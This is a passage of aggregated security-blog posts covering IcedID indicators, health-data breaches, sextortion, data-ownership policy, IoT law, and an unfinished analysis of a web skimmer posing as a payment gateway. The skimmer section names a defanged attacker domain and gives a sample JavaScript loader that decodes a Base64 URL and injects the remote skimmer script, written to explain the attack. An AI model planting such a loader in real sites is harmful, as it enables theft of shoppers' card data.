Indicators of Compromise

Sandbox runs:

https://app.any.run/tasks/8595602a-fa98-4cfa-80d7-98925091dc48/
https://app.any.run/tasks/a7abba78-cf6d-4c68-b94c-4835d5becb13/

MITRE
  • Execution:
    • Command-Line Interface
    • Execution through Module Load
    • Scheduled Task
    • Scripting
    • Windows Management Instrumentation
  • Persistence:
    • Registry Run Keys / Startup Folder
    • Scheduled Task
  • Privilege Escalation
    • Scheduled Task
  • Defense Evasion
    • Scripting
  • Credential Access
    • Credentials in Files
    • Credential Dumping
  • Discovery
    • Network Share Discovery
    • Query Registry
    • Remote System Discovery
    • System Information Discovery
    • System Network Configuration Discovery
  • Lateral Movement
    • Remote File Copy

Source: https://app.any.run/tasks/48414a33-3d66-4a46-afe5-c2003bb55ccf/

References

About the old variants of IcedID:

The post New version of IcedID Trojan uses steganographic payloads appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (November 25 – December 1)

Malware Bytes Security - Mon, 12/02/2019 - 11:23am

Last week on Malwarebytes Labs, we discussed why the notion of “data as property” may potentially hurt more than help, homed in on sextortion scammers getting more creative, and explored the possible security risks Americans might face if the US changed to universal healthcare coverage.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 25 – December 1) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Would ‘Medicare for All’ help secure health data?

Malware Bytes Security - Tue, 11/26/2019 - 3:30pm

DISCLAIMER: This post is not partisan, but rather focuses on risk assessment based on history and what threats we are facing in the future. We do not endorse any healthcare plan style in any way, outside of examining its data security risk.

For many folks, the term ‘Healthcare for All’ brings up an array of emotions ranging from concern to happiness, and with the changes that come with this policy, we’re not surprised. However, beyond the usual arguments on this subject, we wanted to ask the question: Are there any security risks we need to be worried about if the United States were to switch to ‘Healthcare for All’ policies?

To clarify, there are many healthcare for all style plans currently on paper, being fine-tuned in Washington and in the minds of politicians.  So, for the purposes of this article, we’re referring to ‘Healthcare for All’ plans that are meant to replace, not supplement, private insurance plans in addition to legislation that prohibits private insurance companies from collecting and/or storing patient data. 

‘Healthcare for All’ data security

To start, we’re going to examine the government’s track record of securing patient data.  Since we aren’t living in a world where ‘Healthcare for All’ exists in our country, we’ll use data security practices concerning Healthcare.gov and the department that runs it, the Centers for Medicare and Medicaid Services (CMS), to get a sense of how well patient data might be secured by government departments.

The Healthcare.gov website had a bumpy start back in October of 2013. Numerous issues resulted in only a small percentage of patients being able to sign up with the website in the first week.

In an article posted by the Associated Press, as well as independent investigations by the Electronic Frontier Foundation (EFF), it was discovered that Healthcare.gov was sending personal data to third parties by putting personal information in data request headers.

Request header sent to third party advertisers, including personal information. Thanks to EFF.org

Later, in September 2015, the Department of Health and Human Services (HHS) inspector general completed a federal audit of CMS and the Healthcare.gov website.  Their primary concerns were not about patient information being compromised, but rather about the security of a database called MIDAS that stored a lot of personally identifiable information about users of Healthcare.gov. Namely, this database had numerous high-severity vulnerabilities that needed to be patched, and overall, health officials didn’t utilize best practices across the entire system.

Finally, in 2018, the U.S. Government Accountability Office conducted a survey of the Centers for Medicare and Medicaid Services to assess its ability to protect Medicare data from external entities.

According to HIPAA Journal:

“The study had three main objectives: To determine the major external entities that collect, store, and share Medicare beneficiary data, to determine whether the requirements for protection of Medicare data align with federal guidance, and to assess CMS oversight of the implementation of those requirements.”

It turns out that while there are requirements in place to ensure that certain entities are cleared for access to this data, some are not, and therefore could abuse the data they gain access to.  There are three main groups that access Medicare beneficiary data: Medicare Administrative Contractors (MACs), who process Medicare claims; research organizations; and entities that use claims data to assess the performance of Medicare service providers.

Unfortunately, only the processes for clearing MACs and service provider entities are in line with federal guidance, which is designed to be used for all CMS contractors.  Researchers, on the other hand, aren’t considered CMS contractors.  Basically, the oversight required by federal regulation was applied to only two-thirds of the users who could access that data, so there is no guarantee that the data was fully protected.

While we listed numerous instances of government-controlled patient data being put into compromising positions, reports of lost medical data from government-controlled systems are actually very small. I couldn’t find anything that blamed the CMS or HHS for a data breach.

Private Insurance data security

The luck of not having much, if any, medical data breached, despite numerous occasions of unpatched vulnerabilities being identified in Healthcare.gov and its controlling department, doesn’t quite extend to the private insurance world.

In July 2019, Premera Blue Cross, an insurance company serving the Pacific Northwest of the U.S., agreed to pay a settlement of over $10 million to numerous state offices. Premera suffered a massive data breach that exposed the data of more than 10 million patients in 2015. The press release from the Washington State Office of the Attorney General claims:

“From May 5, 2014 until March 6, 2015, a hacker had unauthorized access to the Premera network containing sensitive personal information, including private health information, Social Security numbers, bank account information, names, addresses, phone numbers, dates of birth, member identification numbers and email addresses.”

In addition, there were complaints that Premera misled consumers about the breach and the full scope of potential damage that could be done.

In October of 2018, an employee of Blue Cross Blue Shield of Michigan lost a laptop that had customers’ personal medical data saved on it.  The company jumped into action and worked with a subsidiary to change the access credentials to the encrypted laptop, and to their knowledge, there is no evidence that the patient data was compromised. However, according to CISOMag:

“The access information includes the member’s first name, last name, address, date of birth, enrollee identification number, gender, medication, diagnosis, and provider information. Blue Cross clarified that the Social Security numbers and financial account information were not included in the accessible data.”

Finally, in 2019, Dominion National insurance identified that an unauthorized party may have been able to access internal servers as early as August 2010! According to a press release:

“Dominion National has undertaken a comprehensive review of the data stored or potentially accessible from those computer servers and has determined that the data may include enrollment and demographic information for current and former members of Dominion National and Avalon vision, as well as individuals affiliated with the organizations Dominion National administers dental and vision benefits for. The servers may have also contained personal information pertaining to plan producers and participating healthcare providers. The information varied by individual, but may include names in combination with addresses, email addresses, dates of birth, Social Security numbers, taxpayer identification numbers, bank account and routing numbers, member ID numbers, group numbers, and subscriber numbers.“

These were three examples of breaches that occurred to actual health insurance companies, not third parties or government-controlled healthcare organizations.  In two of these instances, the attacker maintained a foothold on the network for over a year (9 years in Dominion’s case!) and in another instance, someone just lost a laptop full of patient data (the same thing happened to the Department of Homeland Security & The Department of Health & Human Services over the last few years. We need to just tape our laptops to our bodies like a tourist with a passport!)

Why neither of these is the problem

Okay, so which is it? Is it more secure to entrust our government with control of patient data, or are we in better hands with private insurance companies?  The reality is, neither one matters because neither is the actual problem.

It’s not the organizations that we depend on to protect our data that are being breached as much as the third-party organizations they work with.  From mailing services to labs to billing organizations, most of our patient data breaches are happening to organizations who don’t have any real need to hold on to our data, which may be why they fail to secure it. 

Third party breaches

In September of this year, Detroit-based medical contractor Wolverine Solutions Group (WSG) was breached, resulting in the possible compromise of hundreds of thousands of patients nationwide. WSG provided mailing and other services to hospitals and healthcare companies. They were hit by a ransomware attack, which resulted in data belonging to numerous healthcare organizations’ patients being ransomed.

While the investigation into the attack hasn’t produced any evidence that data was stolen, WSG President Darryl English was quoted in the Detroit Free Press:

“Nevertheless, given the nature of the affected files, some of which contained individual patient information (names, addresses, dates of birth, Social Security numbers, insurance contract information and numbers, phone numbers, and medical information, including some highly sensitive medical information), out of an abundance of caution, we mailed letters to all impacted individuals recommending that they take immediate steps to protect themselves from any potential misuse of their information,”

Despite their belief that no patient data was obtained, the same article by the Detroit Free Press describes the case of Tyler Mayes of Oxford, who has identified numerous fraudulent medical charges on his credit report:

“I haven’t been put under the knife in four years,” he said. “So I had a phantom surgery that not even I knew about? I have received no bills in the mail, and have received no phone calls. I have no emails. They just randomly appeared on my credit report. “I think they’re not letting out as much out of the bag as they’ve got in there,” Mayes said of the Wolverine Solutions Group breach.

In May, Spectrum Health Lakeland started sending out letters to about a thousand of their patients because their billing services company (OS, Inc.) was breached, resulting in the possible theft of patient names, addresses, and health insurance providers, but not Social Security and driver’s license numbers (the bad guys will have to find those somewhere else, I guess).

According to an article for MLive Michigan that covers the breach:

“Billing services company OS, Inc. confirmed Wednesday, May 8, an unauthorized individual accessed an employee’s email account that held information related to some Spectrum Health Lakeland patients, according to a Spectrum Health news release.”

A successful phishing attack against the employees of Solara Medical Supplies, reported in mid-November, led to a breach that lasted almost a year and resulted in the loss of employee names and potentially addresses, dates of birth, health insurance information, Social Security numbers, financial and identification information, passwords, PINs, and all kinds of other juicy data.

However, a big concern about the breach of employee e-mail accounts for a third-party vendor is the possibility for attackers to use those infected systems as staging areas to launch additional malicious phishing attacks using e-mail addresses from employees of Solara.

Finally, an ongoing investigation by the Securities and Exchange Commission that started in May 2019 identified that the American Medical Collection Agency (AMCA) was breached for eight months, between August 2018 and March 2019.

Actual numbers of affected patients are still being worked out, however according to Health IT Security, at least six covered entities have reported that their patient data was compromised by the attack. This includes patient information from 12 million folks who have utilized Quest Diagnostics and 7.7 million Labcorp patients.

“And just this week a sixth provider, Austin Pathology Associates, reported at least 46,500 of its patients were impacted by the event. Shortly after, seven more covered entities reported they too were impacted: Natera, American Esoteric Laboratories, CBLPath, South Texas Dermatopathology, Seacoast Pathology, Arizona Dermatopathology, and Laboratory of Dermatopathology ADX.”

When the known affected patient tallies are added together, approximately 25 million patients have had their data compromised thanks to this attack. There are still providers figuring out the full extent, so you can rest assured that the number is likely going to rise.

So, coming back to our original question, it looks like our biggest problem with keeping control of medical data is that it’s spread out all over the place! A ‘Medicare for All’ plan may reduce breaches to some extent, because you’ll remove a few companies that could possess the data. However, based on our own research in this article, we often see greater success by cybercriminals breaching third-party medical vendors than going after government or established insurance companies.

What is being done?

If this is your first time hearing about the potential dangers of third-party data sharing, don’t fret, because politicians are on it!  A first step in taking action to curb data theft is to establish a department specifically for digital privacy, an idea introduced this month by Rep. Anna G. Eshoo [D-CA-18].  The Online Privacy Act of 2019 was introduced to the U.S. House of Representatives in early November.

The purpose of the bill is:

”To provide for individual rights relating to privacy of personal information, to establish privacy and security requirements for covered entities relating to personal information, and to establish an agency to be known as the United States Digital Privacy Agency to enforce such rights and requirements, and for other purposes.”

Online Privacy Act of 2019

There are some politicians who are against this bill and want to continue to have the Federal Trade Commission be the department concerned with digital privacy, however we can see how well that is going.

Beyond just a new department for privacy, Senator Mark R. Warner [D-VA] has called for new legislation on patient data sharing to include stronger language about the importance of establishing controls and security in the development of technologies that allow patients greater insight into their Electronic Health Record (EHR).

The proposed legislation from the Department of Health and Human Services (HHS) requires insurers participating in CMS-run programs, like Medicare, to allow patients to access their health information electronically. They plan to do this by establishing an Application Programming Interface (API) that third-party vendors can utilize to obtain data and make it viewable to the patient.

Sen. Warner, who has been a huge advocate for privacy and security, wrote a letter to the legislation authors, asking for a serious focus on the security of that API so it’s not abused. In the letter he states:

“…I urge CMS to take additional steps to address the potential for misuse of these features in developing the rules around APIs. In just the last three years, technology providers and policymakers have been unable to anticipate – or preemptively address – the misuse of consumer technology which has had a profound impact across our society and economy. As I have stated repeatedly, third-party data stewardship is a critical component of information security…”

Senator Mark R. Warner [D-VA]

We don’t know how much these efforts will help in the long run, but we are in a good position to start seriously discussing the dangers of and solutions to problems concerning digital healthcare data, specifically its uses and abuses.

The wrap-up

Now that we’ve covered all that, did we answer our question? Does ‘Medicare for All’ have any impact on data security? It looks like the answer is no: regardless of the health plan we use, the data is going to continue to be vulnerable, in large part because of third-party sharing.

Neither the government nor private health insurance has a perfect score when it comes to data security, and both have been affected by third-party breaches.  In the case of private insurance companies, breaches like the one at OS, Inc. circumvented all efforts made by Blue Cross and other insurance companies to protect their patient data. At the same time, government healthcare technology has been riddled with misconfigurations and poor practices that frankly make it a miracle that the data hasn’t already been completely harvested by cybercriminals.

The good news is that every attack brings the knowledge of how to avoid one in the future. Our health data is more secure now than any other point of digital healthcare record history, and it’s only going to get better! With the backing of government legislation on the protection of not just medical data, but how it’s transferred and stored, we can turn this whole thing around.

Unfortunately for the millions of patients who have had their personal data stolen and likely stored away in the databases of numerous criminals, and who will likely have to deal with fraud and theft for the foreseeable future, we are the broken eggs in this security omelet. Let’s hope the next group fares better.

The post Would ‘Medicare for All’ help secure health data? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Sextortion scammers getting creative

Malware Bytes Security - Tue, 11/26/2019 - 12:09pm

We’ve covered sextortion before, focusing in on how the core of the threat is an exercise in trust. The threat actor behind the campaign will use whatever information available on the target that causes them to trust that the threat actor does indeed have incriminating information on them. (They don’t.) But as public awareness of the scam grows, threat actors have to pivot to less expected pitches to maintain the same response from victims. Let’s take a look at a recent variant.

As we can see, the technique at hand appears to be peppering the pitch with as many technical terms as possible in order to wear down a victim’s defenses and sell the lie that the threat actor actually hacked them. (NOTE: employing a blizzard of technical vocabulary as quickly as possible is a common technique to sell lies offline, as well as via email.) If we take a closer look, the facade begins to fall away fairly quickly.

  • EternalBlue, RATs, and trojans are all different things
  • Porn sites either don’t allow anonymous user uploads, or scan and monitor those uploads for malicious content
  • The social media data referenced is not stored locally and thus cannot be ‘harvested’ and is largely available on the open web anyway
  • A RAT cannot take a specific action based on what you’re doing in front of an activated camera. How would it know?

Some of these points would be difficult for an average user to realize, but the last two serve as pretty good red flags that the actor in the email is not as sophisticated as he claims. The problem is that by starting the pitch with the most alarming possible outcome, many users are pushed into a panic and don’t stop to consider small details. A key to good defense against sextortion is taking a deep breath, reading the email carefully, and asking yourself – do these claims make sense?

Where did it come from?

Sextortion scammers typically take a shotgun approach to targeting, using compromised or disposable email addresses to send out as many messages as possible. Some variants will attempt to make the pitch more effective by including actual user passwords gleaned from old database breaches. The important thing to remember though, is that the scammers do not have any current information to disclose, because they didn’t actually hack anyone. This is a fairly low effort social engineering attack that remains profitable precisely because the attacker does not have to expend resources actually hacking an end user.

How NOT to get help

The bulk of cyber threats out there are in fact symptoms of human systems failures. Appropriate, responsible infosec responses to these failures give people tools to shore up those systems, thereby ensuring the cyber threat does not claim a foothold to begin with. Less prudent infosec responses, however, do this:

An IP address is the rough online equivalent to a zip code. Could you find where someone whose name you don’t know lives based solely on a zip code? Would you really trust a company who makes grammatical errors in their own Google ads?

Is there anyone in 2019 who genuinely believes it’s possible to keep anything off the Internet? Extraordinary claims require extraordinary evidence, but unfortunately they don’t provide any as their technology is “proprietary.”

It can be very frightening for a user to receive one of these social engineering attempts, particularly if the pitch is loaded with a slew of technical terms they do not understand. But close reading of the email can sometimes reveal red flags indicating the threat actor is not exactly the sharpest hacker out there. Further, the defense against sextortion is one of the cheapest, easiest defenses against cyber threats out there: do nothing. Stay vigilant, and stay safe.

The post Sextortion scammers getting creative appeared first on Malwarebytes Labs.

Categories: Malware Bytes

“Data as property” promises fix for privacy problems, but could deepen inequality

Malware Bytes Security - Mon, 11/25/2019 - 11:00am

In mid-November, Democratic presidential hopeful Andrew Yang unveiled a four-prong policy approach to solving some of today’s thornier tech issues, such as widespread misinformation, technology dependence, and data privacy. Americans, Yang proposed, should receive certain, guaranteed protections for how their data is collected, shared, and sold—and if they choose to waive those rights, they should be compensated for it.

This is, as Yang calls it, “data as a property right.” It is the idea that, since technology companies are making billions of dollars off of what the American public feeds them—data in the forms of “likes,” webpage visits, purchase records, location history, friend connections, etc.—the American public should get a cut of that money, too.

Data property supporters in the US argue that, through data payments, Americans could rebalance the relationship they have with the technology industry, giving them more control over their data privacy and putting some extra money in their pockets, should they want it.

But data privacy advocates argue that, if what Americans need are better data privacy rights, then they should get those in an actual data privacy bill. Further, the data property model could harm more people than it helps, disproportionately robbing low-income communities of their data privacy, while also normalizing the idea that privacy is a mere commodity—it’s only worth the sale price we give it.

To some, a data property model would only keep large corporations in control. No sudden wellspring of rights. No rebalance of power.  

Ulises Mejias, associate professor at State University of New York, Oswego, described the data property model in a broader historical context.

“Paying someone for their work is not a magical recipe for eliminating inequality, as two centuries of capitalism have demonstrated,” Mejias said. He said that, like plantation owners and factory owners, modern data-mining companies understand that, to maintain their profit streams, they have to allow some leniency towards those who they profit from—the people.

“So, we will probably start to see more proposals to ‘fix’ the system by paying us for our data, even from ‘progressive’ figures like Yang or [Jaron] Lanier,” Mejias said. “This, however, does not amount to the dismantling of data colonialism. Rather, it is an attempt to make it the new normal.”

He continued: “The surveillance mechanisms would not go away; they would just be paying us to put up with them.”

Data as property

In 2013, the computer scientist Jaron Lanier, whom Mejias referenced, published the book Who Owns the Future?, a forward-looking, philosophical analysis of our relationship with data and the Internet. In the book, Lanier proposed a then-novel idea: People should be paid royalties for the data they create that goes on to benefit other people.

Six years later, Lanier has refined his ideas into the banner of “data dignity.” As he loftily told the New York Times in a video segment, a recording of “Für Elise” buoying his words:

“You should have the moral rights to every bit of data that exists because you exist, now and forever.”

For data property or dignity supporters, owning your data is a first step toward meaningful, tectonic changes: individualized data privacy controls, higher economic returns, and balanced relationships with technology corporations.

Here’s what that society would allow, supporters say.

One, if consumers own their data, they can make decisions about how companies treat it, including how their data is collected and then shared and sold to separate, third parties. By having the option to say “no” to data sharing and selling, consumers could, in effect, say “no” to some of the most common data privacy oversteps today. No more menstrual tracking information shared with Facebook. No more GPS location data aggregated publicly online. Maybe even no more Cambridge Analytica.

Two, the option to sell data could potentially benefit countless Americans with a near-endless revenue stream. Christopher Tonetti, associate professor of economics at Stanford University’s Graduate School of Business, argued in the Wall Street Journal that data is unlike most any other commodity because its value continues after the first point of sale.

“With most goods—think of a plate of sushi or an hour of your doctor’s time—one person’s consumption of the good means there is less to go around. But data is infinitely usable,” Tonetti said. “That means that if consumers could sell their data, they would have the ability to share the data from any transaction with multiple organizations—to their own benefit and that of society as a whole.”

This potential passive, money-making venture gains even more appeal when major political players—like Yang—argue that “our data is now worth more than oil.”

But there’s missing information in that statement, say data privacy advocates. Our data is worth more than oil to whom?

Data as property flaws

Curiously absent from the discussions about data property rights are detailed analyses about the actual value of consumer data. Sure, the numbers may show that the data-driven advertising industry has eclipsed the dollar-size of the oil industry, but there is no data analogue for what an oil barrel costs. There’s no going rate for Facebook likes, no agreed-upon exchange rate for Instagram popularity.

Hayley Tsukayama, legislative analyst at the Electronic Frontier Foundation, said that the available numbers do not provide reliable statistics when trying to determine data’s “value.”

“When you look at a sell list of location data, and do some back-of-the-envelope math, where a company paid this much for it, and there’s 50 people on the list, and therefore, their data is worth this—that’s not how it works,” Tsukayama said. She said we similarly cannot track the value of the average Facebook user’s data based on a simplistic equation of dividing the company’s ad revenue by its user base.

Tsukayama also pointed to a bigger problem with the data as property model: Consumers will not be selling their data, so much as they’ll be selling their privacy. And for some types of data, the invasion of privacy will always cost too much, she said.

“My location data may cost a penny to buy, but to me that’s worth no amount of money—there’s no amount of money you could pay me to make me okay with someone knowing my location,” she said.

Chad Marlow, senior advocacy and policy counsel at ACLU, added another problem about data valuation: It’s subjective. A company that sells Legos, he said, would pay more for children’s data, much in the same way that a company that sells cars would pay more for adults’ data.

Taking the example to what he called an extreme, Marlow said:

“My tax returns? Probably not worth so much. Trump’s tax returns? Probably worth a big deal!”

In all of these situations, whether it’s vague data valuation, contextual pricing, or putting a literal price tag on privacy, both Tsukayama and Marlow agreed that some consumers will be harmed more than others.

Much like the pay-for-privacy schemes that have bubbled up in the past year, data property models would enable companies to take advantage of low-income communities that need the extra money. It’s much easier for a middle-class earner to say no to a privacy invasion than it is for stressed, hungry families, Marlow said.

“If you have parents who are struggling to put food on the table—who are eating bread and drinking water for multiple dinners—and you say ‘I will give you money if you sell your data’ and you don’t even say how much, they will say yes immediately,” Marlow said. “Because they cannot afford to say no.”

Finally, the actual money going into consumers’ pockets from a data property model might be a “pittance,” Tsukayama said. She added that, for the consumers who take the money, it isn’t worth the cost to their privacy.

“It’s a particularly pernicious form of privacy nihilism, where someone would say ‘Fine, do what you want, just throw me a little bit back,’” Tsukayama said, imagining a bargain in which consumers are fine with privacy invasions so long as they get a little bit of money.

So, if low-income communities are disproportionately harmed, and if consumers receive pennies, and if the sale of privacy becomes normalized for those pennies, who wins in this model?

According to Marlow, the “data agents”—organizations or companies that will facilitate the sale of consumers’ data to one company after another. For every single step of those transactions, Marlow said, each data agent will get a cut of the sale, leaving consumers at the end of the line to collect whatever share remains.

“If you get a cent and they get a nickel, and they do this hundreds of thousands of times, there’s real money to be made for them,” Marlow said.

He said there are already examples of these types of companies. He said he pushed back against one earlier this year, when a data property bill landed in Oregon.

Data as property legislation

In the past year, the idea to treat data as property has escaped the niche audiences served by papers like the Wall Street Journal and the Harvard Business Review.

It’s now inspired lawmakers across the US.

For US Senators Mark Warner and Josh Hawley, who together introduced the DASHBOARD Act, giving consumers better transparency into the value of their data would better enable consumers to make informed decisions about what tech platforms to use. For Representative Doug Collins of Georgia, who proposed a bill to protect online privacy, giving the American people the right to own their data is a cornerstone to navigating the future economy.

But the clearest legislative push for data property rights landed in Oregon earlier this year in Senate Bill 703. Introduced by one state senator and two representatives, the bill was strongly supported by a company called Hu-manity.co, a seemingly small shop with the big idea that legal ownership of data property should be the next, universal human right.

In 2018, Hu-manity.co announced a way to try to provide consumers with that right: its own app, dubbed #My31 (there are currently 30 agreed-upon universal human rights per the United Nations). The app, which focuses strictly on medical data, gives consumers an option to declare how they would like that data to be used, including leasing, sharing, donating, or getting paid for it.

#My31, then, aligned perfectly with SB 703: A bill to allow Oregonians to sell their medical data for money.

Hu-manity.co was far from alone in supporting the bill; many similar companies submitted written testimony for lawmakers to consider. SB 703, the companies said, was a strong step toward protecting consumers’ rights to own and share their medical records as they see fit, potentially enabling them to better develop a comprehensive profile, no matter which hospitals or providers they’d used in the past. Further, some companies said, the ownership of medical data would also allow users to more easily donate that data to medical research.

Marlow saw the bill differently.

“Beware the tech industry’s latest privacy Trojan Horse,” he wrote in March.

“Hu-manity.co argues that, insofar as patient data is already being sold, its legislation is merely designed to give consumers ‘ownership’ of their data and a cut of the profits,” Marlow said. “But savvy bill readers will note that the proposed laws contain no defined percentage of the profits patients are entitled to, so they could receive mere pennies of Hu-manity.co’s revenue in return for giving up their privacy.”

Health Wizz, a company that also lets users control their medical data, wrote in its testimony: “We don’t need more privacy legislation,” but instead, better transparency.

Introduced in January, SB 703 is currently before the state Senate’s Joint Committee on Ways and Means.

Winners and losers

Depending on who you ask, the ability for consumers to own their data will produce one of two winners—consumers or corporations.

According to Mejias, the associate professor at SUNY Oswego, though, there is no reason to expect the data property model to solve our current privacy problems; it will only deepen them:

“The promise of a few more bucks at a time when social support systems are disappearing and inequality is rising would simply re-create an unequal system where those with more means can afford privacy and freedom, and those with less means are subjected to more intrusion, surveillance and quantification, which ultimately perpetuates their position.”

The post “Data as property” promises fix for privacy problems, but could deepen inequality appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (November 18 – 24)

Malware Bytes Security - Mon, 11/25/2019 - 7:55am

Last week on Malwarebytes Labs, we looked at stalkerware’s legal enforcement problem, announced our cooperation with other security vendors and advocacy groups to launch Coalition Against Stalkerware, published our fall 2019 review of exploit kits, looked at how Deepfake on LinkedIn makes for malign interference campaigns, rounded up our knowledge about the Disney+ security and service issues, explained juice jacking, analyzed how a web skimmer phishes credit card data via a rogue payment service platform, and lastly, we looked at upcoming IoT bills and guidelines.

Other cybersecurity news
  • Ransomware attacks against US city and state governments have become increasingly common. Once again, Louisiana has been targeted. (Source: TechSpot)
  • National Veterinary Associates was hit by a ransomware attack late last month that affected more than half of its animal care facilities. (Source: KrebsOnSecurity)
  • After a deadline for receiving a ransom payment was missed, the group behind Maze ransomware published data and files stolen from security staffing firm Allied Universal. (Source: BleepingComputer)
  • A WhatsApp flaw could let hackers steal users’ chat messages, pictures, and private information by tricking users into downloading a video file containing malicious code. (Source: The Daily Mail UK)
  • An active malicious campaign spoofs an urgent update email from Microsoft to infect users’ systems with the Cyborg ransomware. (Source: TechRadar)
  • Microsoft has invested $1 billion in the Elon Musk-founded artificial intelligence venture that plans to mimic the human brain using computers. (Source: Independent UK)
  • A unique data leak contains personal and social information on 1.2 billion people, and appears to originate from two different data enrichment companies. (Source: DataViper)
  • The US branch of telecommunications giant T-Mobile disclosed a security breach that, according to the company, impacted a small number of customers of its prepaid service. (Source: SecurityAffairs)
  • A hacker has published more than 2TB of data from the Cayman National Bank, including more than 640,000 emails and the data of more than 1,400 customers. (Source: HeadLeaks)
  • A ransomware outbreak has besieged a Wisconsin-based IT company that provides cloud data hosting, security, and access management to more than 100 nursing homes across the United States. (Source: KrebsOnSecurity)

Stay safe, everyone!

The post A week in security (November 18 – 24) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

IoT bills and guidelines: a global response

Malware Bytes Security - Fri, 11/22/2019 - 11:27am

You may not have noticed, but Internet of Things (IoT) rules and regulations are coming whether manufacturers want them or not. From experience, drafting up laws which are (hopefully) sensible and have some relevance to problems raised by current technology is a time-consuming, frustrating process.

However, it’s not that long since we saw IoT devices go mainstream—right into people’s homes, controlling real-world aspects of their day-to-day lives, and also causing mishaps and serious issues for people dealing with them.

The theoretical IoT wild west may be drawing to a close, so we’re taking a look at some IoT related bills and guidelines currently in the news.

Where did this all begin?

You’ve probably seen articles in the last few days talking about multiple upcoming changes and suggestions for IoT vendors, but in fact, the first steps were taken last year, when California decided the time was ripe for a little IoT regulation.

If you sell or offer IoT devices in California (where the term covers any Internet-connected device), the device must be equipped with “reasonable security features.”

Bills, bills, bills

Here’s the text of the California bill.

The key parts are these:

“Connected device” means any device, or other physical object that is capable of connecting to the Internet, directly or indirectly, and that is assigned an Internet Protocol address or Bluetooth address.

The definition of a connected device is as wide-ranging as you’d expect, which is a good thing considering anything from your printer to your refrigerator could be communicating with the big wide world outside.

That’s great—but what, exactly, is a reasonable security feature?

Next up:

(b) Subject to all of the requirements of subdivision (a), if a connected device is equipped with a means for authentication outside a local area network, it shall be deemed a reasonable security feature under subdivision (a) if either of the following requirements are met:

(1) The preprogrammed password is unique to each device manufactured.

(2) The device contains a security feature that requires a user to generate a new means of authentication before access is granted to the device for the first time.

We’re essentially in password town. If the shipped password is unique and not something you can plug a serial number into Google to discover, or the device owner is forced to create a unique password the first time they fire it up, that would count as “reasonable security.”

One small step for IoT

Is that enough, though? Some US-based legal eagles suggest it isn’t, and they may well have a point. If IoT legislation doesn’t end up considering things like secure communication, tampering, updates, or even what happens when a device is no longer supported, then this could become messy quickly.

Even so, cheap devices with zero password functionality built in are commonplace, and an absolute curse for anyone trying to secure networks and keep users safe.

The California bill applies to any device sold or offered for sale in California; it doesn’t matter where they’re made. If your password name isn’t down, you’re not getting in, for want of a better and considerably less mangled expression.

This is due to roll into action on the first of January 2020, not only in California but also Oregon. It seems the US is taking the potential for IoT chaos seriously and I’d be amazed if this doesn’t end up going live in additional states in the near future.

Tackling the IoT problem globally

It’s not just the US trying to get a grip on IoT. Australia just pushed out its voluntary Code of Practice: Securing the Internet of Things for Consumers [PDF]. Spread across 13 principles, it is significantly more in-depth than the US bill, which so far leaves a lot of areas up for debate. The 13 principles tackle communication security, updates, the ability to easily scrub personal data, and more besides.

Of course, we should temper our expectations somewhat. The US bill goes live in two states only, and there doesn’t seem to be much (or any!) information with regards to punishment, fines, or anything else.

Additionally, you yourself as a consumer can’t do anything off the back of the bill directly. It would have to be the California Attorney General or similar stepping up to the plate. On the other hand, as impressive as the Australian code is—and it is still under consultation—it’s currently only voluntary.

Even so, getting people in a position of authority to think about these issues is important, and at the very least these guides will help people at home to make considered, informed decisions about the technology they allow into their homes on a daily basis. Some good first steps, then, but we have a long way to go.

The post IoT bills and guidelines: a global response appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Web skimmer phishes credit card data via rogue payment service platform

Malware Bytes Security - Thu, 11/21/2019 - 12:30pm

Heading into the holiday shopping season, we have been tracking increased activity from a threat group registering domains for skimming and phishing campaigns. While most of the campaigns implemented a web skimmer in the typical fashion—grabbing and exfiltrating data from a merchant’s checkout page to an attacker-controlled server—a new attack scheme has emerged that tricks users into believing they’re using a payment service platform (PSP).

PSPs are quite common and work by redirecting the user from a (potentially compromised) merchant site onto a secure page maintained by the payment processing company. This is not the first time a web skimmer has attempted to interfere with PSPs, but in this case, the attackers created a completely separate page that mimics a PSP.

By blending phishing and skimming together, threat actors developed a devious scheme, as unaware shoppers will leak their credentials to the fraudsters without thinking twice.

Standard skimmer

Over the past few months, we’ve tracked a group that has been active with web skimmer and phishing templates. As web security firm Sucuri noted, most of the domains are registered via the medialand.regru@gmail[.]com email address.

Many of their skimmers are loaded as a fake Google Analytics library called ga.js. One of several newly-registered domain names we came across had a skimmer that fit the same template, hosted at payment-mastercard[.]com/ga.js.

Figure 1: Simple skimmer based on previous template

This malicious ga.js file is injected into compromised online shops via a one-line piece of code that loads the remote script in Base64-encoded form.

Figure 2: A JavaScript library from a compromised shop injected with the skimmer
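To make the mechanics concrete, here is a hypothetical reconstruction of how such a one-line injection decodes its Base64 payload. The attackers’ exact code is not reproduced in this post, so the structure below is illustrative only:

```javascript
// Illustrative only: the real injected one-liner is not shown in this post.
// The idea: a Base64 string hides the skimmer URL from casual inspection,
// and decoding it at runtime loads the fake "ga.js" into the page.

// In a browser, atob() decodes Base64; we emulate it here for Node.
const atob = (s) => Buffer.from(s, "base64").toString("binary");

// Base64 of the (defanged) skimmer URL seen in this campaign
const encoded = Buffer.from("https://payment-mastercard[.]com/ga.js").toString("base64");

// A compromised shop would then do something equivalent to:
//   const el = document.createElement("script");
//   el.src = atob(encoded);
//   document.head.appendChild(el);
console.log(atob(encoded));
```

Encoding the URL this way buys the attacker nothing cryptographically; it just keeps the skimmer domain from appearing as plain text when someone skims the shop’s source.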

However, one thing we noticed is that the payment-mastercard[.]com domain was also hosting a completely different kind of skimmer that at first resembled a phishing site.

Phish-like skimmer

This skimmer is interesting because it looks like a phishing page copied from an official template for CommWeb, a payments acceptance service offered by Australia’s Commonwealth Bank (https://migs.mastercard.com.au).

Figure 3: Fraudulent and legitimate payment gateways shown side by side

As the text reads, “Your details will be sent to and processed by The Commonwealth Bank of Australia and will not be disclosed to the merchant,” this is not a login page designed to phish credentials, but rather a pretend payment gateway service.

The attackers have crafted it specifically for an Australian store running the PrestaShop Content Management System (CMS), exploiting the fact that it accepts payments via the Commonwealth Bank.

Figure 4: Modes of payments accepted by the store

The scheme consists of swapping the legitimate e-banking page with the fraudulent one in order to collect the victims’ credit card details. We also noticed the fake page did something we don’t always see with standard skimmers: it checked that all fields were valid and informed the user if they weren’t.

